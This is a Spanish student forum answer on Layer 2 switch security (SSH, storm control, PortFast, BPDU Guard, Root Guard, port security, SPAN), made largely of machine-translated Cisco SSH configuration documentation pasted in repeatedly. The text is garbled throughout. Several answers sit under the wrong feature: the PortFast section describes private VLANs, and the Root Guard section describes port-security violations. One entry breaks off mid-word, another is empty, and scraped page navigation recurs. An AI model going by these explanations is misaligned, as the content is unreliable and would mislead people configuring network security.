Control de acceso

FORO 7

Realiza un anlisis de acceso SSH, control de tormentas de broadcast, PortFast, BPDU Guard, Root Guard, seguridad de puertos, y Switched Port Analyzer. Contesta lo siguiente:

Enuncia, cules son las vulnerabilidades y ataques ms comunes de las que nos protegen las soluciones de seguridad anteriores? SSH
Secure Shell (SSH) es una aplicacin y un protocolo que permite el reemplazo seguro para el conjunto de Berkeley r-tools tales como rsh, rlogin y rcp. (Cisco IOS admite rlogin). El protocolo fija las sesiones a travs de mecanismos de cifrado estndar, y la aplicacin puede ser utilizada de forma similar a la rexec Berkeley y herramientas de rsh. El cliente SSH permite el inicio de las sesiones seguras desde un router a cualquier otro servidor de SSH, incluyendo a otro router, que puede proporcionar una comunicacin segura y encriptada a travs de redes inseguras. El cliente SSH tambin soporta la autenticacin de ID de usuario y contrasea usando mtodos de autenticacin estndar: la autenticacin local, RADIUS y TACACS +.

Control de tormentas de broadcast (Storm control):

Una tormenta de trfico se produce cuando la LAN sufre una inundacin paquetes, la creacin de un trfico excesivo y rendimiento de la red. La funcin de control tormenta de trfico impide que los puertos LAN sean interrumpidos por una difusin, multidifusin, o una tormenta de trfico unicast en las interfaces fsicas. Control de trfico de tormenta (tambin llamada la supresin del trfico) controla los niveles de entrada de trfico en un intervalo de 1 segundo de control de trfico de la tormenta y, durante el intervalo, se compara el nivel de trfico con el nivel de trfico de control de tormentas que se configure. El control de tormenta de trfico a nivel es un porcentaje del ancho de banda total disponible del puerto. Cada puerto tiene una sola tormenta trfico a nivel de control que se utiliza para todo tipo de trfico (broadcast, multicast y unicast). Debe el conmutador ser compatible con el control del trfico tormenta de multidifusin y unidifusin slo en puertos Gigabit Ethernet LAN. El conmutador es compatible con el control de tormentas de difusin del trfico en todos los puertos LAN. El Control de trfico de tormenta no suprime los paquetes de expansin de los rboles. Excepto para los paquetes del rbol de expansin, control de trfico tormenta no hace diferencia entre el control del trfico y el trfico de datos.

El Control de trfico de tormenta monitorea el nivel de cada tipo de trfico para los que permiten el control del trfico de tormenta en intervalos de 1 segundo de control de trfico tormenta. Dentro de un intervalo, cuando el trfico de entrada para las que est habilitado el control del trfico tormenta llega la tormenta de trfico a nivel de control que se configura en el puerto, el control del trfico tormenta deja caer el trfico hasta que la tormenta trfico intervalo de control extremos. Los siguientes son ejemplos de comportamiento de control de trfico tormenta: Si habilita el trfico de difusin del control de tormentas, y el trfico de difusin excede el nivel de control dentro de un intervalo de 1 segundo el trfico de la tormenta, control de trfico tormenta cae todo el trfico de difusin hasta el final del intervalo de control de trfico tormenta. Si activa la emisin y control de trfico de tormenta multicast, y la emisin combinada y el trfico de multidifusin supera el nivel de control dentro de un intervalo de 1 segundo el trfico de la tormenta, en el control de trfico tormenta cae todo trfico de broadcast y multicast hasta el final del intervalo de control de trfico tormenta. Si activa la emisin y control de trfico multicast tormenta, y el trfico de difusin excede el nivel de control dentro de un intervalo de 1 segundo el trfico de la tormenta, control de trfico tormenta cae todo trfico de broadcast y multicast hasta el final del intervalo de control de trfico tormenta. Si activa la emisin y control de trfico multicast tormenta, y el trfico de multidifusin supera el nivel de control dentro de un intervalo de 1 segundo el trfico de la tormenta, control de trfico tormenta cae todo trfico de broadcast y multicast hasta el final del intervalo de control de trfico tormenta.

BPDU Guard:
Ataques por sustitucin y/o engao: Con BPDU guard habilitado, STP cierra las interfaces con PortFast habilitado que reciben BPDUs (sin BPDU Guard se bloquean y permiten trfico STP).

Root Guard:
La funcin de Root Guard en STP es evitar que un puerto se convierta en un puerto raz o un puerto bloqueado. Si un puerto configurado por root guard recibe un BPDU superior, el puerto va inmediatamente a la inconsistencia y bloquea el estado. La vul

Seguridad de puertos:
Se puede usar la caracterstica de seguridad para restringir el puerto de entrada a una interfaz mediante la limitacin y la identificacin de direcciones MAC de las estaciones de trabajo que se les permite acceder al puerto. Cuando se asigna segura las direcciones MAC a un puerto seguro, el puerto no envia paquetes con direcciones de origen fuera del grupo de direcciones definidas. Si limita el nmero de direcciones MAC para asegurarse y asignar una nica direccin MAC seguras, la estacin de trabajo conectada a ese puerto asegura el ancho de banda del puerto. Si un puerto est configurado como un puerto seguro y el nmero mximo de direcciones MAC seguras se alcanza, cuando la direccin MAC de una estacin de trabajo intenta acceder al puerto y es diferente de cualquiera de las direcciones MAC seguras identificadas, se produce una violacin de seguridad. Si una estacin de trabajo con una direccin segura MAC configurada o se obtienen en un intento de puerto seguro para acceder a otro puerto seguro, se marca una violacin. Despus de establecer el nmero mximo de direcciones MAC seguras en un puerto, las direcciones de seguridad se incluyen en una tabla de direcciones en una de las siguientes maneras: Puede configurar todas las direcciones MAC seguras mediante el uso de la switchport portsecurity mac-address mac_address interfaz de comandos de configuracin. Puede permitir que el puerto para configurar dinmicamente las direcciones MAC seguras con las direcciones MAC de los dispositivos conectados. Se puede configurar un nmero de direcciones y permitir que el resto se configura dinmicamente.

Switched Port Analyzer:

En la tarea de administracin de redes LAN es de fundamental importancia mantener un atento monitoreo del trfico y del desempeo de los dispositivos de la infraestructura de red. En este contexto es frecuente que por diferentes motivos (deteccin de trfico no deseado, relevamiento de actividad de ciertos protocolos, etc.) el Administrador requiera utilizar un analizador de protocolos (p.e. Ethereal) para monitorear, decodificar y comprender el trfico de la red. Para esta tarea, luego de instalar el analizador de protocolos en una terminal, se ha de conectar la estacin de monitoreo a un switch o hub a fin de capturar y revisar el trfico que est atravesando la red. Si la infraestructura de la red est compuesta de hubs, esta es una tarea relativamente sencilla. Sin embargo la mayora de nuestras redes actuales utilizan switches. Y no es posible monitorear el trfico de la red si la estacin de monitoreo est sencillamente conectada a un puerto de un switch.

Define y justifica, cundo sera necesario implementar cada uno de ellos?. SSH
La ventaja de ssh (Secure SHell, por cierto) es que es seguro, el trfico entre los equipos es encriptado, estable, robusto, fcil de actualizar y usar, etc. Ha tenido serios bugs como cualquier

otro programa pero como buen software open source es rpidamente actualizado en cuestin de horas literalmente, cuando nuevas vulnerabilidades se le conocen, adems de que tiene utileras agregadas como scp y sftp, as como clientes excelentes tanto en Linux y Windows, en fin altamente recomendable su uso en la vida diaria de cualquier administrador o usuario Linux.

Control de tormentas de broadcast (Storm control):

Errores en la implementacin de protocols, configuraciones de red errneas o usuarios atacando la red con DoS pueden provocar una tormenta. Storm Control (o supresin de trfico) monitorea los paquetes que pasan de las interfaces al bus de switching y determina si el paquete es unicast, multicast, o broadcast. El switch realiza conteo de los paquetes de un tipo especfico recibidos en un intervalo de 1 segundo y luego compara el nmero de paquetes con el umbral de nivel de supresin predefinido. Con storm control, el puerto bloquea el trfico cuando el umbral mximo ha sido alcanzado. El puerto permanece bloqueado hasta que la tasa de trfico cae por debajo del umbral mnimo (si se ha especificado uno) y entonces transmite trfico de forma normal. En general, entre ms alto es el umbral, la proteccin contra tormentas de broadcast es menos efectiva.

PortFast:
Cumplir con estas restricciones y directrices para configurar VLANs privadas: Establecer VTP en modo transparente. Despus de configurar una VLAN privada, no se puede cambiar el modo VTP cliente o servidor. Vase el captulo 8, "Configuracin de VTP." No es posible incluir una VLAN o VLAN desde 1002 hasta 1005 en el sector privado de configuracin de VLAN. Utilice nicamente los comandos de configuracin de VLAN privada para asignar puertos a las VLAN primaria, aislado, o de la comunidad. Capa de 2 puertos de acceso asignados a la VLAN que se configure como VLAN primaria, aislado, o de la comunidad estn inactivos, mientras que la VLAN es parte de la configuracin de VLAN privada. Capa 2 interfaces tronco permanecen en el estado de reenvo STP. Configuracin de Capa 3 interfaces VLAN VLAN slo para primaria. Capa 3 interfaces VLAN para las VLAN aisladas y de la comunidad estn inactivos, mientras que la VLAN se configura como un hecho aislado o VLAN de la comunidad.

BPDU Guard: Seguridad de puertos:

Despus de que el nmero mximo de direcciones MAC seguras se configura, se almacenan en una tabla de direcciones. Para asegurarse de que un dispositivo conectado tiene el ancho de banda del puerto, establecer el nmero mximo de direcciones a una y configurar la direccin MAC de los dispositivos conectados. Se recomienda implementarlo cuando: Un puerto seguro no puede ser un puerto troncal. Un puerto seguro no puede ser un puerto de destino para la centralita de Port Analyzer (SPAN). Un puerto seguro no puede pertenecer a un EtherChannel canal de puertos de interfaz.

 Un puerto seguro no puede ser un puerto 802.1X. Si intenta habilitar 802.1x en un puerto seguro, un mensaje de error, y 802.1X no est habilitado. Si se intenta cambiar un puerto habilitados para 802.1X a un puerto seguro, un mensaje de error, y la configuracin de seguridad no se cambian. Tenga cuidado cuando se habilita la seguridad portuaria en los puertos conectados a los interruptores adyacentes cuando hay enlaces redundantes que corre entre los interruptores de seguridad porque el puerto podra errores desactivar los puertos debido a violacines de seguridad portuaria.

Root Guard:
Una violacin de la seguridad se produce cuando el nmero mximo de direcciones MAC seguras se han aadido a la tabla de direcciones y una estacin de trabajo cuya direccin MAC no se encuentra en la tabla de direcciones intenta acceder a la interfaz. Usted puede configurar la interfaz de uno de los tres modos de violacin: proteger, restringir, o el cierre

Switched Port Analyzer:

Cuando se monta una estacin de monitoreo, en principio se busca capturar tanto trfico como resulte posible para luego filtrarlo y de ese modo quedarse con lo que verdaderamente se est buscando. Sin embargo, si la estacion de monitoreo est conectada a una boca de un switch lo nico que se puede capturar es el trfico generado en la misma terminal o que tiene a esa terminal como destino, as como el trfico de broadcast que est circulando por ese segmento de red. Porqu ocurre esto? Pues simplemente porque el switch divide dominios de colisin. O lo que es lo mismo, cuando su tabla de direcciones MAC ya est poblada, establece circuitos punto a punto entre los puertos que desean entablar la comunicacin evitando inundar todos los puertos con el trfico, como lo hara un hub. Los switches slo inundan los puertos con trfico de broadcast, o que tiene una direccin MAC destino desconocida. Por este motivo, nuestra estacin de monitoreo al estar conectada a un switch ya no puede capturar todo el trfico que circula por l sino solamente el que tiene su direccin MAC como origen o destino, o trfico de broadcast. Lo que necesitamos en nuestra tarea es que el switch enve una copia de toda trama que circule por l al puerto en el que hemos conectado nuestra estacin de monitoreo. Para esto podemos recurrir a un feature de los switches Cisco llamado Switched Port ANalyzer (SPAN) o una variante, Remote SPAN (RSPAN). Se trata de una funcionalidad semejante a la que en otros fabricantes se conoce como "port mirroring". Switched Port Analyzer permite tomar el trfico que atraviesa por un puerto, grupo de puertos o VLAN completa de un switch y lo copia en el puerto de destino, que es el puerto en el que debemos conectar nuestra estacin de monitoreo. Adicionalmente, al configurar esta funcionalidad se especifica no slo los puertos de origen y destino, sino tambin si se desea copiar el trfico que tiene ese puerto como origen, destino o ambos.

Describa un ejemplo en una empresa o entorno corporativo.

Secure Shell (SSH) es un protocolo que proporciona una conexin de acceso remoto seguro a los dispositivos de red. La comunicacin entre el cliente y el servidor est cifrada tanto en la versin 1 de SSH y la versin 2 de SSH. Implementar la versin 2 de SSH siempre que sea posible, ya que utiliza un algoritmo de cifrado de seguridad ms reforzada. Este documento explica cmo configurar y depurar SSH en los routers Cisco o interruptores que ejecutan una versin del software Cisco IOS que soporte SSH. Este documento contiene ms informacin sobre versiones especficas y las imgenes de software. Requisitos: La imagen de Cisco IOS utilizado debe ser un K9 (cripto) la imagen con el fin de apoyar SSH. Componentes utilizados La informacin contenida en este ejemplo se basa en Cisco IOS Software 3600 (C3640-IK9S-M), versin 12.2 (2) T1. SSH fue introducido en estas plataformas de Cisco IOS y las imgenes: SSH versin 1.0 (SSH v1) servidor fue introducido en algunas plataformas de Cisco IOS y las imgenes que se inician en el software Cisco IOS versin 12.0.5.S. El cliente de SSH se introdujo en algunas plataformas de Cisco IOS y las imgenes a partir de Cisco IOS Software 12.1.3.T. lanzamiento SSH terminal de acceso en lnea (tambin conocido como reverse-Telnet) se introdujo en algunas plataformas de Cisco IOS y las imgenes a partir de Cisco IOS Software 12.2.2.T. lanzamiento SSH versin 2.0 (SSH v2) el apoyo fue introducido en algunas plataformas de Cisco IOS y las imgenes a partir de Cisco IOS Software versin 12.1 (19) E. Diagrama de red

Prueba sin autenticacin SSH Primera prueba de la autenticacin sin SSH para asegurarse de que la autenticacin trabaja con el router de Carter antes de agregar SSH. La autenticacin puede ser un nombre de usuario y contrasea locales o con una autenticacin, autorizacin y contabilidad (AAA) del servidor que ejecuta TACACS + o RADIUS. (Autenticacin a travs de la contrasea de la lnea no es posible con SSH.) Este ejemplo muestra la autenticacin local, que le permite Telnet en el router con el nombre de usuario "cisco" y la contrasea "cisco".
!--- The aaa new-model command causes the local username and password on the router !--- to be used in the absence of other AAA statements. aaa new-model username cisco password 0 cisco line vty 0 4 transport input telnet !--- Instead of aaa new-model, you can use the login local command.

Prueba de la autenticacin con SSH Para poner a prueba la autenticacin de SSH, usted tiene que aadir a las declaraciones anteriores con el fin de habilitar SSH en Carter y SSH de prueba desde el PC y estaciones UNIX.
ip domain-name rtp.cisco.com !--- Generate an SSH key to be used with SSH. crypto key generate rsa ip ssh time-out 60 ip ssh authentication-retries 2

En este punto, el programa clave de cifrado RSA mypubkey comando debe mostrar la clave generada. Despus de agregar la configuracin de SSH, prueba su capacidad para acceder al router desde el PC y la estacin de UNIX. Si esto no funciona, consulte la seccin de depuracin de este documento. Configuracin opcional de configuracin Prevenir para no SSH Conexiones Si desea evitar que las conexiones SSH no, agregue la entrada de transporte de SSH en las lneas de comandos para limitar el router para conexiones SSH solamente. Recta (no SSH) telnet se neg.
line vty 0 4 !--- Prevent non-SSH Telnets. transport input ssh

Prueba para asegurarse de que no los usuarios no pueden SSH Telnet al router de Carter. Configurar un Router o Switch IOS como SSH Client Hay cuatro pasos necesarios para habilitar el soporte SSH en un router Cisco IOS:

Configurar el comando hostname. Configure el dominio DNS. Generar la clave SSH que se utilizar. Habilitar el soporte SSH de transporte para el tipo de terminal virtual (vtys). Para tener un dispositivo que actue como un cliente SSH , se puede agregar SSH a un segundo dispositivo llamado Reed. Estos dispositivos estn entonces en funcin cliente-servidor, donde Carter acta como servidor, y Reed acta como el cliente. El Cisco IOS de configuracin del cliente SSH en Reed es el mismo que requiere de la configuracin del servidor SSH en Carter.
!--- Step 1: Configure the hostname if you have not previously done so. hostname carter !--- The aaa new-model command causes the local username and password on the router !--- to be used in the absence of other AAA statements. aaa new-model username cisco password 0 cisco !--- Step 2: Configure the DNS domain of the router. ip domain-name rtp.cisco.com !--- Step 3: Generate an SSH key to be used with SSH. crypto key generate rsa ip ssh time-out 60 ip ssh authentication-retries 2 !--- Step 4: By default the vtys' transport is Telnet. In this case, !--- Telnet is disabled and only SSH is supported. line vty 0 4 transport input SSH !--- Instead of aaa new-model, you can use the login local command.

Se ejecuta el comando a SSH desde el Cisco IOS cliente SSH (Reed) de Cisco IOS servidor SSH (Carter) con el fin de probar esto

SSH v1:
ssh -l cisco -c 3des 10.13.1.99 ssh -v 2 -c aes256-cbc -m hmac-sha1-160 -l cisco 10.31.1.99

SSH v2:

Configuracin de un router IOS como un servidor de SSH que realiza la autenticacin del usuario, segn RSA

Siga estos pasos para configurar el servidor SSH para realizar la autenticacin basada en RSA.

1. Especificar el nombre de host.

Router(config)#hostname <host name>

2. Definir un nombre de dominio predeterminado.

Router(config)#ip domain-name <Domain Name>

3. Generar pares de claves RSA.

Router(config)#crypto key generate rsa

4. Configurar SSH RSA claves para el usuario y la autenticacin del servidor.

Router(config)#ip ssh pubkey-chain

5. Configure el nombre de usuario SSH.

Router(conf-ssh-pubkey)#username <user name>

6. Especificar la clave RSA pblica del extremo remoto.

Router(conf-ssh-pubkey-user)#key-string

7. Especificar el tipo de claves SSH y la versin. (Opcional)

Router(conf-ssh-pubkey-data)#key-hash ssh-rsa <key ID>

8. Salir del modo actual y volver al modo EXEC privilegiado.

Router(conf-ssh-pubkey-data)#end

Aadir SSH Terminal acceso en lnea

Si se necesita de salida de terminal SSH-line de autenticacin, se puede configurar y probar SSH para telnet inverso de salida a travs de Carter, que acta como un servidor de comunicacin a Filadelfia.
ip ssh port 2001 rotary 1 line 1 16 no exec rotary 1 transport input ssh exec-timeout 0 0 modem In Out Stopbits 1

Si Filadelfia es conectado al puerto de Carter 2, se puede configurar SSH a Filadelfia a travs de Carter de Reed con la ayuda de este comando:

SSH v1:
ssh -c 3des -p 2002 10.13.1.99 ssh -v 2 -c aes256-cbc -m hmac-sha1-160 -p 2002 10.31.1.99

SSH v2:

SE puede utilizar este comando de Solaris:

ssh -c 3des -p 2002 -x -v 10.13.1.99

ID del documento: 4145 Descargas en PDF Configuracin de Secure Shell en routers y switches Cisco IOS Running

Documentos relacionados Cmo configurar SSH en switches Catalyst CatOS Running Seguridad de Cisco: Una vulnerabilidad en Cisco IOS servidor Shell seguro Notas de la versin de Cisco IOS versin 12.2SX en el Catalyst 6500 Series MSFC Notas de la versin para los routers de Cisco Serie 1700 de Cisco IOS 12.3 (8) XX2d *Cisco IOS Software Releases 12.3 despliegues especiales y Early]

Ms ... Productos relacionados / Tecnologa Cisco Catalyst 3750 Series Switches Cisco Catalyst 4000 Series Switches Cisco Catalyst 2940 Series Switches Cisco Catalyst 4500 Series Switches Ms ... Secure Shell (SSH) Cisco Catalyst 2970 Series Switches Cisco Catalyst 2950 Series Switches Cisco Catalyst 6500 Series Switches Cisco Catalyst 3550 Series Switches

Related Discussion switches ssh remotely

 SSH Access through 3745+Firewall/IDS... Cisco GSR 12406 SSH... SSH access to Cisco Switches SSH key's encrypted, usage-keys,...

Contenido Introduccin Requisitos previos Requisitos Los componentes utilizados Convenciones SSH v1 v2 vs SSH Diagrama de red Prueba de autenticacin Prueba sin autenticacin SSH Prueba de la autenticacin con SSH Configuracin opcional de configuracin Prevenir para no SSH Conexiones Configurar un Router o Switch IOS como SSH Client Configuracin de un router IOS como un servidor de SSH que realiza la autenticacin del usuario, segn RSA Aadir SSH Terminal acceso en lnea Restringir el acceso SSH a una subred Configurar la versin SSH Variaciones en la salida de bandera Comando No se puede mostrar el mensaje de login depuracin y mostrar los comandos Ejemplo de salida de depuracin Router de depuracin Servidor de depuracin Qu puede salir mal SSH desde un cliente SSH no se compila con el cifrado de datos estndar (DES) Contrasea incorrecta SSH cliente enva no compatibles (Blowfish) Cifrado Consiguiendo el "% SSH-3-PrivateKey: No se puede recuperar la clave privada RSA de" Error Consejos para solucionar problemas Cisco Community Support - Conversaciones destacados Informacin relacionada Introduccin Secure Shell (SSH) es un protocolo que proporciona una conexin de acceso remoto seguro a los dispositivos de red. La comunicacin entre el cliente y el servidor est cifrada tanto en la versin 1 de SSH y la versin 2 de SSH. Implementar la versin 2 de SSH siempre que sea posible, ya que utiliza un algoritmo de cifrado de seguridad ms reforzada.

Este documento explica cmo configurar y depurar SSH en los routers Cisco o interruptores que ejecutan una versin del software Cisco IOS que soporte SSH. Este documento contiene ms informacin sobre versiones especficas y las imgenes de software. Requisitos previos Requisitos La imagen de Cisco IOS utilizado debe ser un K9 (cripto) la imagen con el fin de apoyar SSH. Por ejemplo C3750E-universalk9-tar.122-35.SE5.tar es una K9 (cifrado) de la imagen. Los componentes utilizados La informacin contenida en este documento se basa en Cisco IOS Software 3600 (C3640-IK9SM), versin 12.2 (2) T1. SSH fue introducido en estas plataformas de Cisco IOS y las imgenes: SSH versin 1.0 (SSH v1) servidor fue introducido en algunas plataformas de Cisco IOS y las imgenes que se inician en el software Cisco IOS versin 12.0.5.S. El cliente de SSH se introdujo en algunas plataformas de Cisco IOS y las imgenes a partir de Cisco IOS Software 12.1.3.T. lanzamiento SSH terminal de acceso en lnea (tambin conocido como reverse-Telnet) se introdujo en algunas plataformas de Cisco IOS y las imgenes a partir de Cisco IOS Software 12.2.2.T. lanzamiento SSH versin 2.0 (SSH v2) el apoyo fue introducido en algunas plataformas de Cisco IOS y las imgenes a partir de Cisco IOS Software versin 12.1 (19) E. Se refieren a Cmo configurar SSH en los switches Catalyst de Ejecucin CatOS para obtener ms informacin sobre el soporte SSH en los interruptores. Consulte el Software Advisor ( registrados slo los clientes) para obtener una lista completa de los conjuntos de caractersticas compatibles con las diferentes versiones del software Cisco IOS y en diferentes plataformas. La informacin presentada en este documento se cre con los productos en un entorno de laboratorio especficos. Todos los dispositivos utilizados en este documento se inici con un aclarado (por defecto) de configuracin. Si usted est en una red real, asegrese de que entienden el impacto potencial de cualquier comando antes de que lo utilice. Convenciones Refirase a la tcnica de Cisco Convenciones Consejos para obtener ms informacin sobre las convenciones de documentos. SSH v1 v2 vs SSH Utilice el Cisco Software Advisor ( registrados slo los clientes) con el fin de ayudarle a encontrar la versin de cdigo con el apoyo adecuado, ya sea para SSH v1 v2 o SSH. Diagrama de red

ssh-1.gif Prueba de autenticacin Prueba sin autenticacin SSH Primera prueba de la autenticacin sin SSH para asegurarse de que la autenticacin trabaja con el router de Carter antes de agregar SSH. La autenticacin puede ser un nombre de usuario y contrasea locales o con una autenticacin, autorizacin y contabilidad (AAA) del servidor que ejecuta TACACS + o RADIUS. (Autenticacin a travs de la contrasea de la lnea no es posible con SSH.) Este ejemplo muestra la autenticacin local, que le permite Telnet en el router con el nombre de usuario "cisco" y la contrasea "cisco".

! --- El aaa nuevo modelo de comando hace que el nombre de usuario y contrasea locales en el router ! --- Para ser utilizado en ausencia de otras declaraciones de AAA. aaa nuevo modelo Nombre de usuario contrasea cisco cisco 0 line vty 0 4 de transporte de entrada de telnet ! --- En vez de aaa nuevo modelo, puede utilizar el comando de inicio de sesin local. Prueba de la autenticacin con SSH Para poner a prueba la autenticacin de SSH, usted tiene que aadir a las declaraciones anteriores con el fin de habilitar SSH en Carter y SSH de prueba desde el PC y estaciones UNIX. ip domain-name rtp.cisco.com ! --- Generacin de una clave SSH para ser usado con SSH. crypto key generate rsa ip ssh tiempo de espera de 60 ip autenticacin de ssh-reintentos 2 En este punto, el programa clave de cifrado RSA mypubkey comando debe mostrar la clave generada. Despus de agregar la configuracin de SSH, prueba su capacidad para acceder al router desde el PC y la estacin de UNIX. Si esto no funciona, consulte la seccin de depuracin de este documento. Configuracin opcional de configuracin Prevenir para no SSH Conexiones Si desea evitar que las conexiones SSH no, agregue la entrada de transporte de SSH en las lneas de comandos para limitar el router para conexiones SSH solamente. Recta (no SSH) telnet se neg.

line vty 0 4 ! --- Impedir que los no-SSH telnet. de transporte de entrada ssh Prueba para asegurarse de que no los usuarios no pueden SSH Telnet al router de Carter. Configurar un Router o Switch IOS como SSH Client Hay cuatro pasos necesarios para habilitar el soporte SSH en un router Cisco IOS: Configurar el comando hostname. Configure el dominio DNS. Generar la clave SSH que se utilizar. Habilitar el soporte SSH de transporte para el tipo de terminal virtual (vtys). Si usted desea tener un dispositivo de actuar como un cliente SSH para el otro, puede agregar SSH a un segundo dispositivo llamado Reed. Estos dispositivos estn entonces en un acuerdo de cliente-servidor, donde Carter acta como servidor, y Reed acta como el cliente. El Cisco IOS de configuracin del cliente SSH en Reed es el mismo que requiere de la configuracin del servidor SSH en Carter.

! --- Paso 1: Configure el nombre si no lo ha hecho anteriormente. nombre carter ! --- El aaa nuevo modelo de comando hace que el nombre de usuario y contrasea locales en el router ! --- Para ser utilizado en ausencia de otras declaraciones de AAA. aaa nuevo modelo Nombre de usuario contrasea cisco cisco 0 ! --- Paso 2: Configure el dominio DNS del router. ip domain-name rtp.cisco.com ! --- Paso 3: Generar una clave SSH para ser usado con SSH. crypto key generate rsa ip ssh tiempo de espera de 60 ip autenticacin de ssh-reintentos 2 ! Paso --- 4: Por defecto, el transporte vtys es Telnet. En este caso,

! --- Telnet est desactivado y slo SSH compatible. line vty 0 4 de transporte de entrada SSH ! --- En vez de aaa nuevo modelo, puede utilizar el comando de inicio de sesin local. Ejecute este comando a SSH desde el Cisco IOS cliente SSH (Reed) de Cisco IOS servidor SSH (Carter) con el fin de probar esto: SSH v1: ssh-l-cisco c 3des 10.13.1.99 SSH v2: ssh-v 2-c AES256-CBC-m HMAC-SHA1-160-L Cisco 10.31.1.99 Configuracin de un router IOS como un servidor de SSH que realiza la autenticacin del usuario, segn RSA Siga estos pasos para configurar el servidor SSH para realizar la autenticacin basada en RSA. Especificar el nombre de host. Router (config) # hostname <nombre de host> Definir un nombre de dominio predeterminado. Router (config) # ip domain-name <Nombre de dominio> Generar pares de claves RSA. Router (config) # crypto key generate rsa Configurar SSH RSA claves para el usuario y la autenticacin del servidor. Router (config) # ip ssh pubkey de cadena Configure el nombre de usuario SSH. Router (conf-ssh-pubkey) # nombre de usuario <nombre de usuario> Especificar la clave RSA pblica del extremo remoto. Router (conf-ssh-pubkey-usuario) # cadena-clave Especificar el tipo de claves SSH y la versin. (Opcional)

Router (conf-ssh-pubkey de datos) # clave hash ssh-rsa <key ID> Salir del modo actual y volver al modo EXEC privilegiado. Router (conf-ssh-pubkey de datos) # end Nota: Consulte la versin segura Shell 2 Soporte para ms informacin. Aadir SSH Terminal acceso en lnea Si usted necesita de salida de terminal SSH-line de autenticacin, puede configurar y probar SSH para telnet inverso de salida a travs de Carter, que acta como un servidor de comunicacin a Filadelfia. ip ssh puerto 2001 giratorio 1 lnea 1 16 no ejecutivo giratorio 1 de transporte de entrada ssh exec-timeout 0 0 mdem en salir Bits de parada 1 Si Filadelfia es conectado al puerto de Carter 2, se puede configurar SSH a Filadelfia a travs de Carter de Reed con la ayuda de este comando: SSH v1: ssh-c 3des-p 2002 10.13.1.99 SSH v2: ssh-v 2-c AES256-CBC-m HMAC-SHA1-160-p 2002 10.31.1.99 Puede utilizar este comando de Solaris: ssh-c 3des-p 2002-x-v 10.13.1.99 Restringir el acceso SSH a una subred Es necesario limitar la conectividad SSH a una subred especfica en todos los dems intentos de SSH desde fuera de la subred IP debe suprimirse. Se puede utilizar estos pasos para llevar a cabo la misma: Definir una lista de acceso que permita el trfico de esa subred especfica. Restringir el acceso a la interfaz de lnea VTY con una clase de acceso. Este es un ejemplo de configuracin. En este ejemplo, slo el acceso SSH a la subred 255.255.255.0 10.10.10.0 est permitida, ningn otro se le niega el acceso.

Router(config)#access-list 23 permit 10.10.10.0 0.0.0.255 Router(config)#line vty 5 15 Router(config-line)#transport input ssh Router(config-line)#access-class 23 in Router(config-line)#exit

ID del documento: 4145 Descargas en PDF Configuracin de Secure Shell en routers y switches Cisco IOS Running

Documentos relacionados Cmo configurar SSH en switches Catalyst CatOS Running Seguridad de Cisco: Una vulnerabilidad en Cisco IOS servidor Shell seguro Notas de la versin de Cisco IOS versin 12.2SX en el Catalyst 6500 Series MSFC Notas de la versin para los routers de Cisco Serie 1700 de Cisco IOS 12.3 (8) XX2d *Cisco IOS Software Releases 12.3 despliegues especiales y Early]

Ms ... Productos relacionados / Tecnologa Cisco Catalyst 3750 Series Switches Cisco Catalyst 4000 Series Switches Cisco Catalyst 2940 Series Switches Cisco Catalyst 4500 Series Switches Ms ... Secure Shell (SSH) Cisco Catalyst 2970 Series Switches Cisco Catalyst 2950 Series Switches Cisco Catalyst 6500 Series Switches Cisco Catalyst 3550 Series Switches

Related Discussion switches ssh remotely SSH Access through 3745+Firewall/IDS... Cisco GSR 12406 SSH... SSH access to Cisco Switches SSH key's encrypted, usage-keys,...

Contenido Introduccin Requisitos previos Requisitos Los componentes utilizados Convenciones SSH v1 v2 vs SSH Diagrama de red Prueba de autenticacin Prueba sin autenticacin SSH Prueba de la autenticacin con SSH Configuracin opcional de configuracin Prevenir para no SSH Conexiones Configurar un Router o Switch IOS como SSH Client Configuracin de un router IOS como un servidor de SSH que realiza la autenticacin del usuario, segn RSA Aadir SSH Terminal acceso en lnea Restringir el acceso SSH a una subred Configurar la versin SSH Variaciones en la salida de bandera Comando No se puede mostrar el mensaje de login depuracin y mostrar los comandos Ejemplo de salida de depuracin Router de depuracin Servidor de depuracin Qu puede salir mal SSH desde un cliente SSH no se compila con el cifrado de datos estndar (DES) Contrasea incorrecta SSH cliente enva no compatibles (Blowfish) Cifrado Consiguiendo el "% SSH-3-PrivateKey: No se puede recuperar la clave privada RSA de" Error Consejos para solucionar problemas Cisco Community Support - Conversaciones destacados Informacin relacionada Introduccin Secure Shell (SSH) es un protocolo que proporciona una conexin de acceso remoto seguro a los dispositivos de red. La comunicacin entre el cliente y el servidor est cifrada tanto en la versin 1 de SSH y la versin 2 de SSH. Implementar la versin 2 de SSH siempre que sea posible, ya que utiliza un algoritmo de cifrado de seguridad ms reforzada. Este documento explica cmo configurar y depurar SSH en los routers Cisco o interruptores que ejecutan una versin del software Cisco IOS que soporte SSH. Este documento contiene ms informacin sobre versiones especficas y las imgenes de software. Requisitos previos Requisitos

La imagen de Cisco IOS utilizado debe ser un K9 (cripto) la imagen con el fin de apoyar SSH. Por ejemplo C3750E-universalk9-tar.122-35.SE5.tar es una K9 (cifrado) de la imagen. Los componentes utilizados La informacin contenida en este documento se basa en Cisco IOS Software 3600 (C3640-IK9SM), versin 12.2 (2) T1. SSH fue introducido en estas plataformas de Cisco IOS y las imgenes: SSH versin 1.0 (SSH v1) servidor fue introducido en algunas plataformas de Cisco IOS y las imgenes que se inician en el software Cisco IOS versin 12.0.5.S. El cliente de SSH se introdujo en algunas plataformas de Cisco IOS y las imgenes a partir de Cisco IOS Software 12.1.3.T. lanzamiento SSH terminal de acceso en lnea (tambin conocido como reverse-Telnet) se introdujo en algunas plataformas de Cisco IOS y las imgenes a partir de Cisco IOS Software 12.2.2.T. lanzamiento SSH versin 2.0 (SSH v2) el apoyo fue introducido en algunas plataformas de Cisco IOS y las imgenes a partir de Cisco IOS Software versin 12.1 (19) E. Se refieren a Cmo configurar SSH en los switches Catalyst de Ejecucin CatOS para obtener ms informacin sobre el soporte SSH en los interruptores. Consulte el Software Advisor ( registrados slo los clientes) para obtener una lista completa de los conjuntos de caractersticas compatibles con las diferentes versiones del software Cisco IOS y en diferentes plataformas. La informacin presentada en este documento se cre con los productos en un entorno de laboratorio especficos. Todos los dispositivos utilizados en este documento se inici con un aclarado (por defecto) de configuracin. Si usted est en una red real, asegrese de que entienden el impacto potencial de cualquier comando antes de que lo utilice. Convenciones Refirase a la tcnica de Cisco Convenciones Consejos para obtener ms informacin sobre las convenciones de documentos. SSH v1 v2 vs SSH Utilice el Cisco 